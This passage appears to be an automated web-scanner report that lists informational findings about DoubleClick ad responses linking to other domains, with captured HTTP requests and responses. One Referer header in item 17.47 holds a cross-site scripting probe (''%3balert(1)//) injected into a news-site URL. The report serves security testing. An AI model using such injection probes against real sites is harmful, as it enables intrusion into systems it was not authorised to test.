Referer: http://bh.heraldinteractive.com/includes/processAds.bg?position=Top&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 5216
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 29 Jan 2011 01:54:37 GMT
Expires: Sat, 29 Jan 2011 01:54:37 GMT
Discarded: true

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 6,329 Template Name = 1. Banner Creative (Flash) - In Pag
...[SNIP]...
<!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
58576&migTrackFmtExt=client;io;ad;crtv&migUnencodedDest=http://www.radioshack.com/uc/index.jsp?page=researchLibraryArticle&articleUrl=../graphics/uc/rsk/USContent/HTML/pages/q1wireless.html&noBc=true"><img src="http://s0.2mdn.net/2782903/EVO_Shift_4G728x90.jpg" width="728" height="90" border="0" alt="" galleryimg="no"></a></noscript><img src="http://t.mookie1.com/t/v1/imp?%25&migAgencyId=43&migSource=adsrv2&migTrackDataExt=2782903;58087454;234178444;40401740&migRandom=4958576&migTrackFmtExt=client;io;ad;crtv" width="0" height="0" border="0" /><script src="http://ar.voicefive.com/bmx3/broker.pli?pid=p85001580&PRAd=58087454&AR_C=40401740"></script>
...[SNIP]...

17.45. http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.7

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3867.270604.B3/B5128597.7

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /adi/N3867.270604.B3/B5128597.7;sz=728x90;click0=http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000950192/cstr=50344343=_4d437b72,5284078472,766161_950192_1183_0,1_/xsxdata=$XSXDATA/bnum=50344343/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/22038498/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=22038498? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 29 Jan 2011 02:29:27 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5218

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 6,329 Template Name = 1. Banner Creative (Flash) - In Pag
...[SNIP]...
<!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
48951&migTrackFmtExt=client;io;ad;crtv&migUnencodedDest=http://www.radioshack.com/uc/index.jsp?page=researchLibraryArticle&articleUrl=../graphics/uc/rsk/USContent/HTML/pages/q1wireless.html&noBc=true"><img src="http://s0.2mdn.net/2782903/EVO_Shift_4G728x90.jpg" width="728" height="90" border="0" alt="" galleryimg="no"></a></noscript><img src="http://t.mookie1.com/t/v1/imp?%25&migAgencyId=43&migSource=adsrv2&migTrackDataExt=2782903;58087454;234178444;40401740&migRandom=7048951&migTrackFmtExt=client;io;ad;crtv" width="0" height="0" border="0" /><script src="http://ar.voicefive.com/bmx3/broker.pli?pid=p85001580&PRAd=58087454&AR_C=40401740"></script>
...[SNIP]...

17.46. http://ad.doubleclick.net/adi/N4270.Tribal_Fusion/B5094437.2

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N4270.Tribal_Fusion/B5094437.2

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /adi/N4270.Tribal_Fusion/B5094437.2;sz=728x90;click=http://a.tribalfusion.com/h.click/a7mNvB0GM0YcJY1cZbpnqvW2UQVWbMAUAQYQav0ScUrQtbx1dvqWP3N2GY50UYZcVATv4PZb8PmbE2dYn1dnLpdTM36MY5V3aVcQjWcF7SAFOWtY3Ubb45bEqWEUoVaJdQaZbZcRGJZbQU6vPWM8WcU25rmsndeO0tqIwxZbMVw/;ord=1115025470?\ HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 6223
Cache-Control: no-cache
Pragma: no-cache
Date: Fri, 28 Jan 2011 16:39:39 GMT
Expires: Fri, 28 Jan 2011 16:39:39 GMT
Connection: close

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
<!-- Code auto-generated on Fri Jan 14 13:32:32 EST 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
AUAQYQav0ScUrQtbx1dvqWP3N2GY50UYZcVATv4PZb8PmbE2dYn1dnLpdTM36MY5V3aVcQjWcF7SAFOWtY3Ubb45bEqWEUoVaJdQaZbZcRGJZbQU6vPWM8WcU25rmsndeO0tqIwxZbMVw/http://www.adobe.com/products/premiere/switch/?sdid=IEFXL"><img src="http://s0.2mdn.net/1295336/Adobe_DVSwitcher_MercEngine_728x90_img.jpg" width="728" height="90" border="0" alt="Advertisement" galleryimg="no"></a>
...[SNIP]...

17.47. http://ad.doubleclick.net/adi/N4270.Tribal_Fusion/B5094437.2

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N4270.Tribal_Fusion/B5094437.2

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /adi/N4270.Tribal_Fusion/B5094437.2;sz=728x90;click=http://a.tribalfusion.com/h.click/a7mNvB0GM0YcJY1cZbpnqvW2UQVWbMAUAQYQav0ScUrQtbx1dvqWP3N2GY50UYZcVATv4PZb8PmbE2dYn1dnLpdTM36MY5V3aVcQjWcF7SAFOWtY3Ubb45bEqWEUoVaJdQaZbZcRGJZbQU6vPWM8WcU25rmsndeO0tqIwxZbMVw/;ord=1115025470? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/blogs11ddd'%3balert(1)//e0aca46f7df/rangers/2011/01/live-chat-wednesday-at-2-pm
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Fri, 28 Jan 2011 14:48:52 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6204

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
<!-- Code auto-generated on Fri Jan 14 19:33:23 EST 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
YQav0ScUrQtbx1dvqWP3N2GY50UYZcVATv4PZb8PmbE2dYn1dnLpdTM36MY5V3aVcQjWcF7SAFOWtY3Ubb45bEqWEUoVaJdQaZbZcRGJZbQU6vPWM8WcU25rmsndeO0tqIwxZbMVw/http://www.adobe.com/products/creativesuite/design?sdid=IEFXL"><img src="http://s0.2mdn.net/1295336/Adobe_CS5_DPTruerEdge_728x90_img.jpg" width="728" height="90" border="0" alt="" galleryimg="no"></a>
...[SNIP]...

17.48. http://ad.doubleclick.net/adi/N4319.MSNMEN/B3889285.5

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N4319.MSNMEN/B3889285.5

Issue detail

The page was loaded from a URL containing a query string. The response contains the following link to another domain:

Request

GET /adi/N4319.MSNMEN/B3889285.5;sz=160x600;;sz=160x600;ord=106131971?click=http://yads.zedo.com/ads2/c%3Fa=883600%3Bn=826%3Bx=1821%3Bc=826000187,826000187%3Bg=172%3Bi=0%3B1=8%3B2=1%3Bs=173%3Bg=172%3Bm=82%3Bw=47%3Bi=0%3Bu=INmz6woBADYAAHrQ5V4AAACH~010411%3Bsn=951%3Bsc=2%3Bss=2%3Bsi=0%3Bse=1%3Bp%3D8%3Bf%3D1077676%3Bh%3D1037004%3Bk=http://clk.redcated/goiframe/198095575.198102272/267856416/direct/01%3fhref= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://redcated/APM/iview/267856416/direct;wi.160;hi.600/01/0.7152271461673081?click=http://yads.zedo.com/ads2/c%3Fa=883600%3Bn=826%3Bx=1821%3Bc=826000187,826000187%3Bg=172%3Bi=0%3B1=8%3B2=1%3Bs=173%3Bg=172%3Bm=82%3Bw=47%3Bi=0%3Bu=INmz6woBADYAAHrQ5V4AAACH~010411%3Bsn=951%3Bsc=2%3Bss=2%3Bsi=0%3Bse=1%3Bp%3D8%3Bf%3D1077676%3Bh%3D1037004%3Bk=
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 29 Jan 2011 13:39:47 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 505

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3a9e/0/0/%2a/w;234512153;0-0;0;58327305;2321-160/600;40019819/40037606/2;u=INmz6woBADYAAHrQ5V4AAACH~010411;~sscs=%3fhttp://www.nutrisystem.com/jsps_hmr/tracking/click.jsp?iid=29574&rURL=/mennoofferweb"><img src="http://s0.2mdn.net/viewad/1323822/Mens_Rollback_160x600.gif" border=0 alt="Advertisement"></a>
...[SNIP]...

17.49. http://ad.doubleclick.net/adi/N4319.MSNMEN/B3889285.6

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N4319.MSNMEN/B3889285.6

Issue detail

The page was loaded from a URL containing a query string. The response contains the following link to another domain:

Request

GET /adi/N4319.MSNMEN/B3889285.6;sz=728x90;;sz=728x90;ord=164770402?click=http://yads.zedo.com/ads2/c%3Fa=883605%3Bn=826%3Bx=3613%3Bc=826000187,826000187%3Bg=172%3Bi=15%3B1=8%3B2=1%3Bs=173%3Bg=172%3Bm=82%3Bw=47%3Bi=15%3Bu=INmz6woBADYAAHrQ5V4AAACH~010411%3Bsn=951%3Bsc=0%3Bss=2%3Bsi=15%3Bse=1%3Bp%3D8%3Bf%3D1077677%3Bh%3D1037004%3Bk=http://clk.redcated/goiframe/198095574.198102269/267856421/direct/01%3fhref= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://redcated/APM/iview/267856421/direct;wi.728;hi.90/01/0.9115818275604397?click=http://yads.zedo.com/ads2/c%3Fa=883605%3Bn=826%3Bx=3613%3Bc=826000187,826000187%3Bg=172%3Bi=15%3B1=8%3B2=1%3Bs=173%3Bg=172%3Bm=82%3Bw=47%3Bi=15%3Bu=INmz6woBADYAAHrQ5V4AAACH~010411%3Bsn=951%3Bsc=0%3Bss=2%3Bsi=15%3Bse=1%3Bp%3D8%3Bf%3D1077677%3Bh%3D1037004%3Bk=
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 29 Jan 2011 02:23:32 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 503

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3a9e/0/0/%2a/n;234512155;0-0;0;58327313;3454-728/90;40019815/40037602/2;u=INmz6woBADYAAHrQ5V4AAACH~010411;~sscs=%3fhttp://www.nutrisystem.com/jsps_hmr/tracking/click.jsp?iid=29574&rURL=/mennoofferweb"><img src="http://s0.2mdn.net/viewad/1323822/Mens_Rollback_728x90.gif" border=0 alt="Advertisement"></a>
...[SNIP]...

17.50. http://ad.doubleclick.net/adi/N4319.MSNMEN/B3889285.7

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N4319.MSNMEN/B3889285.7

Issue detail

The page was loaded from a URL containing a query string. The response contains the following link to another domain:

Request

GET /adi/N4319.MSNMEN/B3889285.7;sz=300x250;;sz=300x250;ord=180294417?click=http://yads.zedo.com/ads2/c%3Fa=883601%3Bn=826%3Bx=2333%3Bc=826000187,826000187%3Bg=172%3Bi=0%3B1=8%3B2=1%3Bs=173%3Bg=172%3Bm=82%3Bw=47%3Bi=0%3Bu=INmz6woBADYAAHrQ5V4AAACH~010411%3Bsn=951%3Bsc=0%3Bss=2%3Bsi=0%3Bse=1%3Bp%3D8%3Bf%3D1077676%3Bh%3D1037004%3Bk=http://clk.redcated/goiframe/198095571.198102267/267856417/direct/01%3fhref= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://redcated/APM/iview/267856417/direct;wi.300;hi.250/01/0.9525772058404982?click=http://yads.zedo.com/ads2/c%3Fa=883601%3Bn=826%3Bx=2333%3Bc=826000187,826000187%3Bg=172%3Bi=0%3B1=8%3B2=1%3Bs=173%3Bg=172%3Bm=82%3Bw=47%3Bi=0%3Bu=INmz6woBADYAAHrQ5V4AAACH~010411%3Bsn=951%3Bsc=0%3Bss=2%3Bsi=0%3Bse=1%3Bp%3D8%3Bf%3D1077676%3Bh%3D1037004%3Bk=
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 29 Jan 2011 14:31:36 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 505

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3a9e/0/0/%2a/e;234512143;0-0;0;58327315;4307-300/250;40019928/40037715/2;u=INmz6woBADYAAHrQ5V4AAACH~010411;~sscs=%3fhttp://www.nutrisystem.com/jsps_hmr/tracking/click.jsp?iid=29574&rURL=/mennoofferweb"><img src="http://s0.2mdn.net/viewad/1323822/Mens_Rollback_300x250.gif" border=0 alt="Advertisement"></a>
...[SNIP]...

17.51. http://ad.doubleclick.net/adi/N4319.msn/B2087123.382

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N4319.msn/B2087123.382

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /adi/N4319.msn/B2087123.382;sz=300x250;;sz=300x250;ord=113577767?click=http://yads.zedo.com/ads2/c%3Fa=883604%3Bn=826%3Bx=2333%3Bc=826000187,826000187%3Bg=172%3Bi=28%3B1=8%3B2=1%3Bs=173%3Bg=172%3Bm=82%3Bw=47%3Bi=28%3Bu=INmz6woBADYAAHrQ5V4AAACH~010411%3Bsn=951%3Bsc=0%3Bss=2%3Bsi=28%3Bse=1%3Bp%3D8%3Bf%3D1077677%3Bh%3D1037004%3Bk=http://clk.redcated/goiframe/196247635.198101849/267856420/direct/01%3fhref= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://redcated/APM/iview/267856420/direct;wi.300;hi.250/01/0.9113153473008424?click=http://yads.zedo.com/ads2/c%3Fa=883604%3Bn=826%3Bx=2333%3Bc=826000187,826000187%3Bg=172%3Bi=28%3B1=8%3B2=1%3Bs=173%3Bg=172%3Bm=82%3Bw=47%3Bi=28%3Bu=INmz6woBADYAAHrQ5V4AAACH~010411%3Bsn=951%3Bsc=0%3Bss=2%3Bsi=28%3Bse=1%3Bp%3D8%3Bf%3D1077677%3Bh%3D1037004%3Bk=
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 29 Jan 2011 02:35:56 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4717

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,901 Template Name = Banner Creative (Flash) - In Page
...[SNIP]...
<!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
0%3B58334028%3B4307-300/250%3B39877283/39895070/1%3Bu%3DINmz6woBADYAAHrQ5V4AAACH%7E010411%3B%7Esscs%3D%3fhttp://www.nutrisystem.com/jsps_hmr/tracking/click.jsp?iid=29572&rURL=/webnoweeksoffernetworks"><img src="http://s0.2mdn.net/1323822/2-Womens_Rollback_300x250.gif" width="300" height="250" border="0" alt="" galleryimg="no"></a>
...[SNIP]...

17.52. http://ad.doubleclick.net/adi/N4682.132309.BURSTMEDIA/B4421704.7

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N4682.132309.BURSTMEDIA/B4421704.7

Issue detail

The page was loaded from a URL containing a query string. The response contains the following link to another domain:

Request

GET /adi/N4682.132309.BURSTMEDIA/B4421704.7;sz=300x250;click=http://www.burstnet.com/ads/ad19083a-map.cgi/BCPG174597.252798.300824/VTS=29iU7.jjkA/SZ=300X250A/V=2.3S//REDIRURL=;ord=3925 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net.57389.9231.302br.net/jsi/adi/N4682.132309.BURSTMEDIA/B4421704.7;sz=300x250;click=http://www.burstnet.com/ads/ad19083a-map.cgi/BCPG174597.252798.300824/VTS=29iU7.jjkA/SZ=300X250A/V=2.3S//REDIRURL=;ord=3925?
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 659
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 29 Jan 2011 01:54:42 GMT
Expires: Sat, 29 Jan 2011 01:54:42 GMT
Discarded: true

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3a9e/4/72/%2a/r
...[SNIP]...
824/VTS=29iU7.jjkA/SZ=300X250A/V=2.3S//REDIRURL=http://www.potterybarnkids.com/shop/sale/accessories-sale/?page=viewall?bnrid=3518504&cm_ven=targeteddisplay&cm_cat=yahoodisplay&cm_pla=Logo&cm_ite=All"><img src="http://s0.2mdn.net/viewad/2388325/PBK_300x250_GearSale_WD111.jpg" border=0 alt="Advertisement"></a>
...[SNIP]...

17.53. http://ad.doubleclick.net/adi/N4682.132309.BURSTMEDIA/B4421704.7

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N4682.132309.BURSTMEDIA/B4421704.7

Issue detail

The page was loaded from a URL containing a query string. The response contains the following link to another domain:

Request

GET /adi/N4682.132309.BURSTMEDIA/B4421704.7;sz=300x250;click=http://www.burstnet.com/ads/ad19083a-map.cgi/BCPG174597.252798.300824/VTS=29iU7.jjkA/SZ=300X250A/V=2.3S//REDIRURL=;ord=3925 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net.57389.9231.302br.net/jsi/adi/N4682.132309.BURSTMEDIA/B4421704.7;sz=300x250;click=http://www.burstnet.com/ads/ad19083a-map.cgi/BCPG174597.252798.300824/VTS=29iU7.jjkA/SZ=300X250A/V=2.3S//REDIRURL=;ord=3925?
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Fri, 28 Jan 2011 22:47:59 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 626

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3a9d/4/72/%2a/u
...[SNIP]...
s/ad19083a-map.cgi/BCPG174597.252798.300824/VTS=29iU7.jjkA/SZ=300X250A/V=2.3S//REDIRURL=http://www.potterybarnkids.com/?bnrid=3518504&cm_ven=targeteddisplay&cm_cat=yahoodisplay&cm_pla=Logo&cm_ite=All"><img src="http://s0.2mdn.net/viewad/2388325/PBK_300x250_StartFresh_Baby_WD111.jpg" border=0 alt="Advertisement"></a>
...[SNIP]...

17.54. http://ad.doubleclick.net/adi/N5823.152304.TRADEDESK/B5157804.4

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5823.152304.TRADEDESK/B5157804.4

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /adi/N5823.152304.TRADEDESK/B5157804.4;sz=728x90;ord=7045426855259476565?;click=http://r.turn.com/r/tpclick/id/VRK9hmVixmGm1AAAcwABAA/3c/http%3A%2F%2Fmedia.fastclick.net%2Fw%2Fclick.here%3Fcid%3D279888%26mid%3D522199%26m%3D1%26sid%3D54393%26c%3D0%26tp%3D5%26forced_click%3D/url/; HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Fri, 28 Jan 2011 23:04:25 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4492

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,900 Template Name = Banner Creative (Flash) - In Page
...[SNIP]...
<!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
D/url/http%3a%2f%2fwww.hp.com/united-states/tradein/promo/laserjet3/index.html%3Fmcc%3DGCJJ%26jumpid%3Dex_r2612_link/1Q11TIAS/1-ADGIO_mcc|GCJJ/dm%3A_N5823.152304.TRADEDESK_58826029_234985230_40268782"><img src="http://s0.2mdn.net/2309962/_Laserjet_TIAS_700_728x90_jpg.jpg" width="728" height="90" border="0" alt="" galleryimg="no"></a>
...[SNIP]...

17.55. http://ad.doubleclick.net/adi/N5823.152304.TRADEDESK/B5157804.5

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5823.152304.TRADEDESK/B5157804.5

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /adi/N5823.152304.TRADEDESK/B5157804.5;sz=300x250;ord=4434400651657365963?;click=http://r.turn.com/r/tpclick/id/y0nM8eUnij0zGgUAaQABAA/3c/http%3A%2F%2Fmedia.fastclick.net%2Fw%2Fclick.here%3Fcid%3D279895%26mid%3D522196%26m%3D6%26sid%3D54393%26c%3D0%26tp%3D8%26forced_click%3D/url/; HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 29 Jan 2011 01:03:25 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4505

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,900 Template Name = Banner Creative (Flash) - In Page
...[SNIP]...
<!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
